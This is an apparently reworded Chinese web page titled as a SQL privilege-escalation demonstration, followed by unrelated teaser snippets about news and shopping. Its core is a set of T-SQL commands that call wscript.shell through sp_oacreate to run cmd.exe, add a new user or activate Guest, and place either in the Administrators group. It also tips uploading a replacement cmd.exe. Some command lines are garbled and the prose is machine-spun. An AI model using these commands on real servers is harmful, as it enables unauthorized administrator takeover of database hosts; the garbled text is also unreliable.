SQL提权演试

发布时间:2020-12-31 14:23 作者:jianzhan

摘要: 小视频,自媒体平台,达种族草一站服务SQL提权演试最先想给大伙儿掌握一下SQL提权常见指令:driver={SQL Server};server=网络服务器IP;uid=客户名;pwd=登陆密码;database=数据信息库名 --联接数据


SQL提权演试


小视频,自媒体平台,达种族草一站服务

SQL提权演试

最先想给大伙儿掌握一下SQL提权常见指令:
driver={SQL Server};server=网络服务器IP;uid=客户名;pwd=登陆密码;database=数据信息库名  --联接数据信息库。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c user 新客户 登陆密码 /add'  --加上新客户。
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c localgroup administrators 新客户 /add'  --把客户加到管理方法组

假如之上加上管理方法员不成功的情况下,大家能够试着激话Guest。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c user guest /active:yes'  --激话GUEST客户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c localgroup Administrators Guest /add'  --把Guest加到管理方法组

留意:假如c:\windows\system32\cmd.exe 删掉除,没管理权限浏览或是回绝浏览得话,大家能够自身提交个CMD上来,随后相对路径改动大家提交的CMD相对路径便可以了。

 

下边给大伙儿演试一下全部SQL提权的全过程:

默认设置GUEST客户登陆密码为空禁止使用情况!

激话GUEST客户

激话GUEST客户取得成功,可是沒有管理权限,因此大家再次把GUEST这一客户加上到管理方法组!

把Guest加到管理方法组

取得成功把GUEST加来到管理方法组,取得成功进到了网络服务器!

进来后能做些甚么?坚信这一也不用我啰嗦了。

初始出處:
著作权全部-转截时务必以连接方式标明初始出處


  • 【GET2017】阿里巴巴云高校

    模拟题目:【GET2017】阿里巴巴巴巴云高等院校王晓斐:阿里巴巴巴巴云高等院校将以场景化方式进行出色优秀人才认证 阿里巴巴巴巴云高等院校主管 王晓斐 芥末堆 十一月23日 报道

  • 凡科抠图为外景美女图片

    Photoshop为外景拍摄漂亮美女照片打造出唯美意境的冷色调暗调红褐色PS同盟 公布 创作者:Sener 我想评价素材图片照片也是以暗色主导,调色的情况下只必须把情况一部分的黄翠绿

  • 淘宝有哪些比较不错的模

    收费标准的还可以…

    产品淘宝主图、店面室内装修、产品

  • 阔知公布新品“ES企培”,

    模拟题目:阔知发布新产品“ES企培”,协作百度搜索检索云启动网上文化艺术文化教育智能化化+计划方案 芥末堆十月30日讯,今日,阔知互连网北京市举行主题风格设计风格为“智能

  • 全世界首例髙速换电互联

    模拟题目:全球首例髙速换电互连网落地式式 ES8购车人全国性性彻底完全免费换电 2018十一月18日23点19分,从北京市市驶出的4辆ES8组成的运送队陆续抵达厚街服务区,这寓意着着蔚来首